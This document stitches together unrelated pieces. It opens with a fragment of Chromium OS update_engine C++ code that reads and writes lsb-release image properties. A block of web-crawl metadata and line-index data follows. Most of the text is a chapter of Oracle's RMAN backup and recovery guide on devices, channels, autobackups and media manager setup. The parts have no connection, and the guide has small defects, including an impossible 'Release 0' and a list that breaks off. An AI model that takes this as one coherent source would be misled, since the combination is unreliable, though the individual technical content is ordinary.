void LoadLsbRelease(LsbReleaseSource source, brillo::KeyValueStore* store) {
std::string path;
if (root_prefix)
path = root_prefix;
if (source == LsbReleaseSource::kStateful)
path += chromeos_update_engine::kStatefulPartition;
store->Load(base::FilePath(path + kLsbRelease));
}
} // namespace
namespace chromeos_update_engine {
namespace test {
void SetImagePropertiesRootPrefix(const char* test_root_prefix) {
root_prefix = test_root_prefix;
}
} // namespace test
ImageProperties LoadImageProperties(SystemState* system_state) {
ImageProperties result;
brillo::KeyValueStore lsb_release;
LoadLsbRelease(LsbReleaseSource::kSystem, &lsb_release);
result.current_channel = GetStringWithDefault(
lsb_release, kLsbReleaseUpdateChannelKey, "stable-channel");
// In dev-mode and unofficial build we can override the image properties set
// in the system image with the ones from the stateful partition, except the
// channel of the current image.
HardwareInterface* const hardware = system_state->hardware();
if (!hardware->IsOfficialBuild() || !hardware->IsNormalBootMode())
LoadLsbRelease(LsbReleaseSource::kStateful, &lsb_release);
// The release_app_id is used as the default appid, but can be override by
// the board appid in the general case or the canary appid for the canary
// channel only.
std::string release_app_id =
GetStringWithDefault(lsb_release, kLsbReleaseAppIdKey, kDefaultAppId);
result.product_id = GetStringWithDefault(
lsb_release, kLsbReleaseBoardAppIdKey, release_app_id);
result.canary_product_id = GetStringWithDefault(
lsb_release, kLsbReleaseCanaryAppIdKey, release_app_id);
result.board = GetStringWithDefault(lsb_release, kLsbReleaseBoardKey, "");
result.version = GetStringWithDefault(lsb_release, kLsbReleaseVersionKey, "");
result.omaha_url =
GetStringWithDefault(lsb_release,
kLsbReleaseAutoUpdateServerKey,
constants::kOmahaDefaultProductionURL);
// Build fingerprint not used in Chrome OS.
result.build_fingerprint = "";
result.allow_arbitrary_channels = false;
return result;
}
MutableImageProperties LoadMutableImageProperties(SystemState* system_state) {
MutableImageProperties result;
brillo::KeyValueStore lsb_release;
LoadLsbRelease(LsbReleaseSource::kSystem, &lsb_release);
LoadLsbRelease(LsbReleaseSource::kStateful, &lsb_release);
result.target_channel = GetStringWithDefault(
lsb_release, kLsbReleaseUpdateChannelKey, "stable-channel");
if (!lsb_release.GetBoolean(kLsbReleaseIsPowerwashAllowedKey,
&result.is_powerwash_allowed))
result.is_powerwash_allowed = false;
return result;
}
bool StoreMutableImageProperties(SystemState* system_state,
const MutableImageProperties& properties) {
brillo::KeyValueStore lsb_release;
LoadLsbRelease(LsbReleaseSource::kStateful, &lsb_release);
lsb_release.SetString(kLsbReleaseUpdateChannelKey, properties.target_channel);
lsb_release.SetBoolean(kLsbReleaseIsPowerwashAllowedKey,
properties.is_powerwash_allowed);
std::string root_prefix_str = root_prefix ? root_prefix : "";
base::FilePath path(root_prefix_str + kStatefulPartition + kLsbRelease);
if (!base::DirectoryExists(path.DirName()))
base::CreateDirectory(path.DirName());
return lsb_release.Save(path);
}
void LogImageProperties() {
std::string lsb_release;
if (utils::ReadFile(kLsbRelease, &lsb_release)) {
LOG(INFO) << "lsb-release inside the old rootfs:\n" << lsb_release;
}
std::string stateful_lsb_release;
if (utils::ReadFile(std::string(kStatefulPartition) + kLsbRelease,
&stateful_lsb_release)) {
LOG(INFO) << "stateful lsb-release:\n" << stateful_lsb_release;
}
}
} // namespace chromeos_update_engine
|
{
"url": "https://chromium.googlesource.com/aosp/platform/system/update_engine/+/cc6ab9f076694a816fa35f133e98e7737542ddd8/image_properties_chromeos.cc",
"source_domain": "chromium.googlesource.com",
"snapshot_id": "crawl=CC-MAIN-2020-45",
"warc_metadata": {
"Content-Length": "67985",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:32UO55QJAH5AM7ZSBHENEUT55HISNSZL",
"WARC-Concurrent-To": "<urn:uuid:6f9d0f91-29e8-491d-9b15-6e53d615c196>",
"WARC-Date": "2020-10-30T05:46:57Z",
"WARC-IP-Address": "173.194.208.82",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:UD4MINQ54SCXLESQBWL7VMEWEG4WUTYO",
"WARC-Record-ID": "<urn:uuid:d864b0ca-1293-459b-86fb-e4fe51a078c8>",
"WARC-Target-URI": "https://chromium.googlesource.com/aosp/platform/system/update_engine/+/cc6ab9f076694a816fa35f133e98e7737542ddd8/image_properties_chromeos.cc",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:c6c708b4-f392-4ba0-8257-8dcf95b69c63>"
},
"warc_info": "isPartOf: CC-MAIN-2020-45\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for October 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-30.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
68,
71,
125,
128,
195,
263,
306,
309,
355,
358,
429,
498,
574,
645,
679,
682,
726,
744,
762,
796,
822,
858,
902,
955,
1008,
1048,
1088,
1100,
1147,
1208,
1275,
1339,
1400,
1466,
1547,
1616,
1681,
1752,
1801,
1836,
1905,
1929,
1965,
1985,
2020,
2035,
2112,
2130,
2152,
2154,
2184,
2193,
2204,
2207,
2287,
2361,
2436,
2456,
2533,
2551,
2568,
2588,
2631,
2683,
2732,
2734,
2749,
2784,
2801,
2867,
2899,
2901,
2921,
2986,
3010,
3045,
3102,
3149,
3210,
3287,
3364,
3397,
3459,
3526,
3585,
3660,
3734,
3751,
3780,
3851,
3893,
3949,
3998,
4055,
4130,
4209,
4228,
4262,
4294,
4334,
4378,
4409,
4450,
4465,
4467,
4546,
4577,
4612,
4669,
4728,
4774,
4835,
4897,
4928,
4965,
4980,
4982,
5042,
5086,
5121,
5180,
5259,
5316,
5350,
5412,
5485,
5529,
5568,
5599,
5601,
5629,
5654,
5704,
5772,
5774,
5808,
5875,
5901,
5965,
5967,
5969
],
"line_end_idx": [
68,
71,
125,
128,
195,
263,
306,
309,
355,
358,
429,
498,
574,
645,
679,
682,
726,
744,
762,
796,
822,
858,
902,
955,
1008,
1048,
1088,
1100,
1147,
1208,
1275,
1339,
1400,
1466,
1547,
1616,
1681,
1752,
1801,
1836,
1905,
1929,
1965,
1985,
2020,
2035,
2112,
2130,
2152,
2154,
2184,
2193,
2204,
2207,
2287,
2361,
2436,
2456,
2533,
2551,
2568,
2588,
2631,
2683,
2732,
2734,
2749,
2784,
2801,
2867,
2899,
2901,
2921,
2986,
3010,
3045,
3102,
3149,
3210,
3287,
3364,
3397,
3459,
3526,
3585,
3660,
3734,
3751,
3780,
3851,
3893,
3949,
3998,
4055,
4130,
4209,
4228,
4262,
4294,
4334,
4378,
4409,
4450,
4465,
4467,
4546,
4577,
4612,
4669,
4728,
4774,
4835,
4897,
4928,
4965,
4980,
4982,
5042,
5086,
5121,
5180,
5259,
5316,
5350,
5412,
5485,
5529,
5568,
5599,
5601,
5629,
5654,
5704,
5772,
5774,
5808,
5875,
5901,
5965,
5967,
5969,
6006
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 6006,
"ccnet_original_nlines": 141,
"rps_doc_curly_bracket": 0.004662000108510256,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.10586010664701462,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.026465030387043953,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.4451795816421509,
"rps_doc_frac_unique_words": 0.4935064911842346,
"rps_doc_mean_word_length": 10.194805145263672,
"rps_doc_num_sentences": 48,
"rps_doc_symbol_to_word_ratio": 0.010396979749202728,
"rps_doc_unigram_entropy": 4.994334697723389,
"rps_doc_word_count": 462,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.034819528460502625,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.021019110456109047,
"rps_doc_frac_chars_top_3gram": 0.005520170088857412,
"rps_doc_frac_chars_top_4gram": 0.006794060114771128,
"rps_doc_books_importance": -293.6482238769531,
"rps_doc_books_importance_length_correction": -293.6482238769531,
"rps_doc_openwebtext_importance": -175.3748779296875,
"rps_doc_openwebtext_importance_length_correction": -175.3748779296875,
"rps_doc_wikipedia_importance": -87.05378723144531,
"rps_doc_wikipedia_importance_length_correction": -87.05378723144531
},
"fasttext": {
"dclm": 0.8546760082244873,
"english": 0.40184682607650757,
"fineweb_edu_approx": 2.935626983642578,
"eai_general_math": 0.9962566494941711,
"eai_open_web_math": 0.1434836983680725,
"eai_web_code": 0.7972778081893921
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.4",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.02",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "4",
"label": "Code/Software"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "0",
"label": "No missing content"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "3",
"label": "Academic Writing"
}
},
"reasoning_depth": {
"primary": {
"code": "4",
"label": "Advanced Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-3,544,112,037,973,179,400
|
Skip Headers
Oracle® Database Backup and Recovery User's Guide
11g Release 2 (11.2)
Part Number E10642-01
Go to Documentation Home
Home
Go to Book List
Book List
Go to Table of Contents
Contents
Go to Index
Index
Go to Master Index
Master Index
Go to Feedback page
Contact Us
Go to previous page
Previous
Go to next page
Next
View PDF
5 Configuring the RMAN Environment
This chapter explains the most basic tasks involved in configuring RMAN. This chapter includes the following topics:
Note:
Configuring RMAN for the Oracle Secure Backup (OSB) Cloud Module, see Appendix C in the Oracle Database Backup and Recovery Reference.
See Also:
Chapter 6, "Configuring the RMAN Environment: Advanced Topics" to learn about configuration options not covered in this chapter, including backup compression and encryption
Configuring the Environment for RMAN Backups
For most parameters required for backups, RMAN provides sensible defaults that enable you to perform basic backup and recovery. When implementing an RMAN-based backup strategy, you can use RMAN more effectively if you understand the more common configurations.
To simplify ongoing use of RMAN, you can set a number of persistent configuration settings for each target database. These settings control many aspects of RMAN behavior. For example, you can configure the backup retention policy, default destinations for backups, default backup device type, and so on. You can use the SHOW and CONFIGURE commands to view and change RMAN configurations.
This section explains what an RMAN configuration is and how you can use the CONFIGURE command to change RMAN default behavior for your backup and recovery environment. This section also introduces the major settings available to you and their most common values.
Note:
If you plan to back up to tape, then refer to "Configuring RMAN to Make Backups to a Media Manager" to learn how to set up RMAN for use with a media manager.
This section includes the following topics:
See Also:
Oracle Database Backup and Recovery Reference for CONFIGURE syntax
Showing and Clearing Persistent RMAN Configurations
You can use the SHOW command to display the current value of RMAN configured settings for the target database. You can also view whether these commands are currently set to their default values.
To view or change your CONFIGURE command settings:
1. Start RMAN and connect to a target database and a recovery catalog (if used).
2. Run the RMAN SHOW command.
For example, run SHOW ALL as shown in Example 5-1 (sample output included). The output includes parameters you have changed and that are set to the default. The configuration is displayed as the series of RMAN commands required to re-create the configuration. You can save the output in a text file and use this command file to re-create the configuration on the same or a different database.
Example 5-1 SHOW ALL Command
SHOW ALL;
RMAN configuration parameters for database with db_unique_name PROD1 are:
CONFIGURE RETENTION POLICY TO RECOVERY WINDOW OF 3 DAYS;
CONFIGURE BACKUP OPTIMIZATION ON;
CONFIGURE DEFAULT DEVICE TYPE TO DISK; # default
CONFIGURE CONTROLFILE AUTOBACKUP ON;
CONFIGURE CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE SBT_TAPE TO '%F'; # default
CONFIGURE CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK TO '%F'; # default
CONFIGURE DEVICE TYPE 'SBT_TAPE' PARALLELISM 2 BACKUP TYPE TO COMPRESSED BACKUPSET;
CONFIGURE DEVICE TYPE DISK PARALLELISM 1 BACKUP TYPE TO BACKUPSET; # default
CONFIGURE DATAFILE BACKUP COPIES FOR DEVICE TYPE SBT_TAPE TO 1; # default
CONFIGURE DATAFILE BACKUP COPIES FOR DEVICE TYPE DISK TO 1; # default
CONFIGURE ARCHIVELOG BACKUP COPIES FOR DEVICE TYPE SBT_TAPE TO 1; # default
CONFIGURE ARCHIVELOG BACKUP COPIES FOR DEVICE TYPE DISK TO 1; # default
CONFIGURE CHANNEL DEVICE TYPE 'SBT_TAPE' PARMS 'ENV=(OB_DEVICE=tape1)';
CONFIGURE MAXSETSIZE TO UNLIMITED; # default
CONFIGURE ENCRYPTION FOR DATABASE OFF; # default
CONFIGURE ENCRYPTION ALGORITHM 'AES128'; # default
CONFIGURE ARCHIVELOG DELETION POLICY TO NONE; # default
CONFIGURE SNAPSHOT CONTROLFILE NAME TO '/disk1/oracle/dbs/snapcf_ev.f'; # default
You can also use the SHOW command with the name of a particular configuration. For example, you can view the retention policy and default device type as follows:
SHOW RETENTION POLICY;
SHOW DEFAULT DEVICE TYPE;
3. Optionally, use the CONFIGURE ... CLEAR command to return any configuration to its default value, as shown in the following examples:
CONFIGURE BACKUP OPTIMIZATION CLEAR;
CONFIGURE RETENTION POLICY CLEAR;
CONFIGURE CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK CLEAR;
Configuring the Default Device for Backups: Disk or SBT
Backups for which no destination device type is specified are directed to the configured default device. RMAN is preconfigured to use disk as the default device type. No additional configuration is necessary.
You may need to change the default device type from disk to tape, or change it back from tape to disk. Table 5-1 shows the commands that configure the default device.
Table 5-1 Commands to Configure the Default Device Type
Command Explanation
CONFIGURE DEFAULT DEVICE TYPE TO DISK
Specifies that backups should go to disk by default.
If a recovery area is enabled, then the backup location defaults to the fast recovery area. Otherwise, the backup location defaults to an operating system-specific directory on disk.
When backing up to disk, the logical block size of the database file must be an even multiple of the physical block size of the destination device. For example, a device of type DISK with a block size of 2 KB can only be used as a destination for backups of database files with logical block sizes of 2 KB, 4 KB, 6 KB, and so on. Most disk drives have physical block sizes of 512 bytes, so this limitation rarely affects backup to disk drives. Nevertheless, you can encounter this limitation when backing up to a writable DVD or a device that has a larger physical block size.
CONFIGURE DEFAULT DEVICE TYPE TO sbt
Specifies that backups should go to tape by default.
"Configuring RMAN to Make Backups to a Media Manager" explains how to set up RMAN for use with a media manager. After RMAN is able to communicate with the media manager, you can configure RMAN to make backups to tape and specify SBT as the default device type.
You can always override the default device by using the DEVICE TYPE clause of the BACKUP command, as shown in the following examples:
BACKUP DEVICE TYPE sbt DATABASE;
BACKUP DEVICE TYPE DISK DATABASE;
To change the configured default device type:
1. Start RMAN and connect to a target database and a recovery catalog (if used).
2. Run the SHOW ALL command to show the currently configured default device.
3. Run the CONFIGURE DEFAULT DEVICE TYPE command, specifying either TO DISK or TO sbt.
See Also:
Oracle Database Backup and Recovery Reference for more details on using the BACKUP command with the DEVICE TYPE clause
Configuring the Default Type for Backups: Backup Sets or Copies
The BACKUP command can create either backup sets or image copies. For disk, you can configure RMAN to create either backup sets or image copies as its default backup type with the CONFIGURE DEVICE TYPE DISK BACKUP TYPE TO command. The default backup type for disk is an uncompressed backup set.
Note:
Because RMAN can write an image copy only to disk, the backup type for tape can only be a backup set.
RMAN can create backup sets using binary compression. You can configure RMAN to use compressed backup sets by default on a device type by specifying the COMPRESSED option in the BACKUP TYPE TO ... BACKUPSET clause. To disable compression, use the CONFIGURE DEVICE TYPE command with arguments specifying your other desired settings, but omit the COMPRESSED keyword.
To configure the default type of backup:
1. Start RMAN and connect to a target database and a recovery catalog (if used).
2. Configure backup sets or image copies as the default backup type.
The following examples configure the backup type for disk backups to copies and backup sets:
CONFIGURE DEVICE TYPE DISK BACKUP TYPE TO COPY; # image copies
CONFIGURE DEVICE TYPE DISK BACKUP TYPE TO BACKUPSET; # uncompressed
The following examples configure compression for backup sets:
CONFIGURE DEVICE TYPE DISK BACKUP TYPE TO COMPRESSED BACKUPSET;
CONFIGURE DEVICE TYPE sbt BACKUP TYPE TO COMPRESSED BACKUPSET;
Configuring Channels
As explained in "RMAN Channels", an RMAN channel is a connection to a database server session. RMAN uses channels to perform almost all RMAN tasks.
About Channel Configuration
Use the CONFIGURE CHANNEL command to configure options for disk or SBT channels. CONFIGURE CHANNEL takes the same options used to specify one-time options with the ALLOCATE CHANNEL command. You can configure generic channel settings for a device type, that is, a template that is used for any channels created based on configured settings for that device.
Note:
This section explains configuration of disk channels. To learn how to configure channels for tape, see "Configuring SBT Channels for Use with a Media Manager".
If you use CONFIGURE CHANNEL to specify generic channel settings for a device, any previous settings are discarded, even if the settings are not in conflict. For example, after the second CONFIGURE CHANNEL command, which specifies only the FORMAT for configured disk channels, the MAXPIECESIZE for the disk channel is returned to its default value:
CONFIGURE CHANNEL DEVICE TYPE DISK MAXPIECESIZE 2G;
CONFIGURE CHANNEL DEVICE TYPE DISK FORMAT /tmp/%U;
Configuring Channels for Disk
By default, RMAN allocates one disk channel for all operations. You may want to specify different options for this channel, for example, a new default location for backups. Example 5-2 configures RMAN to write disk backups to the /disk1 directory and specifies a nondefault format for the relative filename:
Example 5-2 Configuring a Nondefault Backup Location
CONFIGURE CHANNEL DEVICE TYPE DISK FORMAT '/disk1/ora_df%t_s%s_s%p';
In Example 5-2, RMAN automatically replaces the format specifier %t with a four byte time stamp, %s with the backup set number, and %p with the backup piece number.
Note:
By configuring an explicit format for disk channels, RMAN does not create backups by default in the fast recovery area. In this case, you lose the disk space management capabilities of the fast recovery area.
You can also specify an ASM disk location, as shown in the following example:
CONFIGURE CHANNEL DEVICE TYPE DISK FORMAT '+dgroup1';
See Also:
"Backing Up Database Files with RMAN" to learn how to make backups
Configuring Channel Parallelism for Disk and SBT Devices
The number of channels available for a device type when you run a command determines whether RMAN reads or writes in parallel. As a rule, the number of channels used in executing a command should match the number of devices accessed. Thus, for tape backups, allocate one channel for each tape drive. For disk backups, allocate one channel for each physical disk, unless you can optimize the backup for your disk subsystem architecture with multiple channels. Failing to allocate the right number of channels adversely affects RMAN performance during I/O operations.
You can configure channel parallelism settings, binary compression for backup sets, and other options for an SBT device with CONFIGURE DEVICE TYPE sbt. You set the configuration for the device type independently of the channel configuration.
Example 5-3 changes the parallelism for the SBT device (sample output included) so that RMAN can back up to a media manager using two tape drives in parallel. Each configured SBT channel backs up roughly half the total data.
Example 5-3 Configuring Parallelism for an SBT Device
RMAN> CONFIGURE DEVICE TYPE sbt PARALLELISM 2;
old RMAN configuration parameters:
CONFIGURE DEVICE TYPE 'SBT_TAPE' BACKUP TYPE TO COMPRESSED BACKUPSET PARALLELISM 1;
new RMAN configuration parameters:
CONFIGURE DEVICE TYPE 'SBT_TAPE' PARALLELISM 2 BACKUP TYPE TO COMPRESSED BACKUPSET;
new RMAN configuration parameters are successfully stored
Example 5-4 changes the default backup type for the SBT device to an uncompressed backup set (sample output included).
Example 5-4 Configuring the Backup Type for an SBT Device
RMAN> CONFIGURE DEVICE TYPE sbt BACKUP TYPE TO BACKUPSET;
old RMAN configuration parameters:
CONFIGURE DEVICE TYPE 'SBT_TAPE' PARALLELISM 2 BACKUP TYPE TO COMPRESSED BACKUPSET;
new RMAN configuration parameters:
CONFIGURE DEVICE TYPE 'SBT_TAPE' BACKUP TYPE TO BACKUPSET PARALLELISM 2;
new RMAN configuration parameters are successfully stored
The CONFIGURE DEVICE TYPE commands used in this example to set parallelism and backup type do not affect the values of settings not specified. In Example 5-3, the default backup type of compressed backup set was not changed by changing the parallelism. In Example 5-4, the parallelism was not changed by changing the default backup type.
See Also:
Manually Overriding Configured Channels
If you manually allocate a channel during a job, then RMAN disregards any configured channel settings. For example, assume that the default device type is SBT, and you execute the following command:
RUN
{
ALLOCATE CHANNEL c1 DEVICE TYPE DISK;
BACKUP TABLESPACE users;
}
In this case, RMAN uses only the disk channel that you manually allocated within the RUN command, overriding any defaults set by using CONFIGURE DEVICE TYPE, CONFIGURE DEFAULT DEVICE, or CONFIGURE CHANNEL settings.
See Also:
Configuring Control File and Server Parameter File Autobackups
As explained in "Control File and Server Parameter File Autobackups", you can configure RMAN to automatically back up the control file and server parameter file. The autobackup occurs whenever a backup record is added. If the database runs in ARCHIVELOG mode, then an autobackup is also taken whenever the database structure metadata in the control file changes. A control file autobackup enables RMAN to recover the database even if the current control file, recovery catalog, and server parameter file are lost.
Because the filename for the autobackup follows a well-known format, RMAN can search for it without access to a repository and then restore the server parameter file. After you have started the instance with the restored server parameter file, RMAN can restore the control file from an autobackup. After you mount the control file, the RMAN repository is available and RMAN can restore the datafiles and find the archived redo logs.
You can enable the autobackup feature by running the following command:
CONFIGURE CONTROLFILE AUTOBACKUP ON;
You can disable the feature by running the following command:
CONFIGURE CONTROLFILE AUTOBACKUP OFF;
See Also:
Oracle Database Backup and Recovery Reference for CONFIGURE syntax
Configuring the Control File Autobackup Format
By default, the format of the autobackup file for all configured devices is the substitution variable %F in the FORMAT clause. This variable format translates into c-IIIIIIIIII-YYYYMMDD-QQ, with the placeholders defined as follows:
• IIIIIIIIII stands for the DBID.
• YYYYMMDD is a time stamp of the day the backup is generated.
• QQ is the hexadecimal sequence that starts with 00 and has a maximum of FF.
You can change the default format by using the following command, where deviceSpecifier is any valid device type, and 'string' must contain the substitution variable %F (and no other substitution variables) and is a valid handle for the specified device:
CONFIGURE CONTROLFILE AUTOBACKUP FORMAT
FOR DEVICE TYPE deviceSpecifier TO 'string';
For example, you can run the following command to specify a nondefault filename for the control file autobackup. In the filename, ? stands for ORACLE_HOME.
CONFIGURE CONTROLFILE AUTOBACKUP FORMAT
FOR DEVICE TYPE DISK TO '?/oradata/cf_%F';
The following example configures the autobackup to write to an Automatic Storage Management disk group:
CONFIGURE CONTROLFILE AUTOBACKUP FORMAT
FOR DEVICE TYPE DISK TO '+dgroup1/%F';
To clear control file autobackup formats for a device, use the following commands:
CONFIGURE CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK CLEAR;
CONFIGURE CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE sbt CLEAR;
If you have set up a fast recovery area for the database, then you can direct control file autobackups to the fast recovery area by clearing the control file autobackup format for disk.
Note:
All files in the fast recovery area are maintained by Oracle and associated filenames are maintained in the Oracle Managed Files (OMF) format.
Overriding the Configured Control File Autobackup Format
The SET CONTROLFILE AUTOBACKUP FORMAT command, which you can specify either within a RUN command or at the RMAN prompt, overrides the configured autobackup format in the current session only. The order of precedence is:
1. SET CONTROLFILE AUTOBACKUP FORMAT (within a RUN block)
2. SET CONTROLFILE AUTOBACKUP FORMAT (at RMAN prompt)
3. CONFIGURE CONTROLFILE AUTOBACKUP FORMAT
The following example shows how the two forms of SET CONTROLFILE AUTOBACKUP FORMAT interact:
SET CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK TO 'controlfile_%F';
BACKUP AS COPY DATABASE;
RUN
{
SET CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK TO '/tmp/%F.bck';
BACKUP AS BACKUPSET
DEVICE TYPE DISK
DATABASE;
}
The first SET CONTROLFILE AUTOBACKUP FORMAT controls the name of the control file autobackup until the RMAN client exits, overriding any configured control file autobackup format. The SET CONTROFILE AUTOBACKUP FORMAT in the RUN block overrides the SET CONTROLFILE AUTOBACKUP FORMAT outside the RUN block for the duration of the RUN block.
Configuring RMAN to Make Backups to a Media Manager
On most platforms, to back up to and restore from sequential media such as tape you must integrate a media manager with your Oracle database. You can use Oracle Secure Backup, which supports both database and file system backups to tape, as your media manager. You should refer to Oracle Secure Backup Administrator's Guide to learn how to set up RMAN for use specifically with Oracle Secure Backup.
If you do not use Oracle Secure Backup, then you can use a third-party media manager. This section describes the generic steps for configuring RMAN for use with a third-party media manager. The actual steps depend on the media management product that you install and the platform on which you are running the database. If you choose to use RMAN with a media manager other than Oracle Secure Backup, then you must obtain all product-specific information from the vendor.
Read the following sections in order when configuring the media manager:
1. Prerequisites for Using a Media Manager with RMAN
2. Determining the Location of the Media Management Library
3. Configuring Media Management Software for RMAN Backups
4. Testing Whether the Media Manager Library Is Integrated Correctly
5. Configuring SBT Channels for Use with a Media Manager
See Also:
"Media Management" for an overview of media management software and its implications for RMAN
Prerequisites for Using a Media Manager with RMAN
Before you can begin using RMAN with a third-party media manager, you must install it and make sure that RMAN can communicate with it. Refer to the media management vendor's software documentation for instructions.
In general, you should begin by installing and configuring the media management software on the target host or production network. Ensure that you can make non-RMAN backups of operating system files on the target database host. This step makes later troubleshooting much easier by confirming that the basic integration of the media manager with the target host has been successful. Refer to your media management documentation to learn how to back up files to the media manager without using RMAN.
Then, obtain and install the third-party media management module for integration with the database server. This module contains the media management library that the Oracle database loads and uses when accessing the media manager. It is generally a third-party product which must be purchased separately. Contact your media management vendor for details.
Determining the Location of the Media Management Library
Before attempting to use RMAN with a media manager, determine the location of the media management library. When allocating or configuring a channel for RMAN to use to communicate with a media manager, you must specify the SBT_LIBRARY parameter in an ALLOCATE CHANNEL or CONFIGURE CHANNEL command. The SBT_LIBRARY parameter specifies the path to the library.
The following example shows the channel syntax, where pathname is the absolute filename of the library:
CONFIGURE CHANNEL DEVICE TYPE sbt
PARMS 'SBT_LIBRARY=pathname';
When RMAN allocates channels to communicate with a media manager, it attempts to load the library indicated by the SBT_LIBRARY parameter.
If you do not provide a value for the SBT_LIBRARY parameter in an allocated or preconfigured channel, then RMAN looks in a platform-specific and secured default location.
On Linux and UNIX, the SBT library is loaded from:
/opt/oracle/extapi/[32,64]/{SBT}/{VENDOR}/{VERSION}/libobk.so
The SBT library filename extension name varies according to platform: .so, .sl on HP-UX, .a on AIX,
On Windows, the SBT library is loaded from:
%SYSTEM_DRIVE%\oracle\extapi\[32,64]\{SBT}\{VENDOR}\{VERSION}\orasbt.dll
If RMAN is unable to use the secured default location or if you are using Oracle Database 11g Release 0 or earlier, RMAN loads the SBT library from the location designated by the environment variables PATH or LIBPATH.
In some cases, your organization may have security or regulatory compliance requirements that prohibit the use of environment variables PATH or LIBPATH to designate a library directory. If you need to disable this behavior, you can set the PARMS string to the following: SBT_SECURE=1.
Note:
The default media management library file is not part of the standard database installation. It is only present if you install third-party media management software.
See Also:
Your operating system-specific database documentation and the documentation supplied by your media vendor for instructions on how to achieve media manager integration on your platform
Configuring Media Management Software for RMAN Backups
After installing the media management software, perform whatever configuration that your vendor requires so that the software can accept RMAN backups. Depending on the type of media management software that you installed, you may have to define media pools, configure users and classes, and so on.
Consult your media management vendor documentation for the appropriate RMAN settings. The PARMS parameter sends instructions to the media manager. If PARMS values are needed for the ALLOCATE CHANNEL or the CONFIGURE CHANNEL command, or if a FORMAT string is recommended for the BACKUP or CONFIGURE command, then refer to the vendor documentation for this information.
Example 5-5 shows a PARMS setting for Oracle Secure Backup. This PARMS settings instructs the media manager to back up to a family of tapes called datafile_mf. The PARMS settings are always vendor-specific.
Example 5-5 PARMS Setting for Oracle Secure Backup
CONFIGURE CHANNEL DEVICE TYPE 'SBT_TAPE'
PARMS 'ENV=(OB_MEDIA_FAMILY=datafile_mf)';
See Also:
Testing Whether the Media Manager Library Is Integrated Correctly
After you have confirmed that the database server can load the media management library, test to make sure that RMAN can back up to the media manager.
Testing ALLOCATE CHANNEL on the Media Manager
The following steps use the ALLOCATE CHANNEL command to perform a basic test that RMAN is able to communicate with the media manager.
To test channel allocation on the media manager:
1. Start RMAN and connect to a target database and a recovery catalog (if used).
2. Run the ALLOCATE CHANNEL command with the PARMS required by your media management software.
The following RUN command shows sample vendor-specific PARMS settings:
RUN
{
ALLOCATE CHANNEL c1 DEVICE TYPE sbt
PARMS 'SBT_LIBRARY=/mydir/lib/libobk.so,
ENV=(OB_DEVICE=drive1,OB_MEDIA_FAMILY=datafile_mf)';
}
3. Examine the RMAN output.
If you do not receive an error message, then the database successfully loaded the media management library. If you receive the ORA-27211 error, the media management library could not be loaded:
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03009: failure of allocate command on c1 channel at 11/30/2007 13:57:18
ORA-19554: error allocating device, device type: SBT_TAPE, device name:
ORA-27211: Failed to load Media Management Library
Additional information: 25
In this case, you must check the media management installation to make sure that the library is correctly installed, and re-check the value for the SBT_LIBRARY parameter as described in "Determining the Location of the Media Management Library".
If the database is unable to locate a media management library in the location specified by the SBT_LIBRARY parameter or the default location, then RMAN issues an ORA-27211 error and exits.
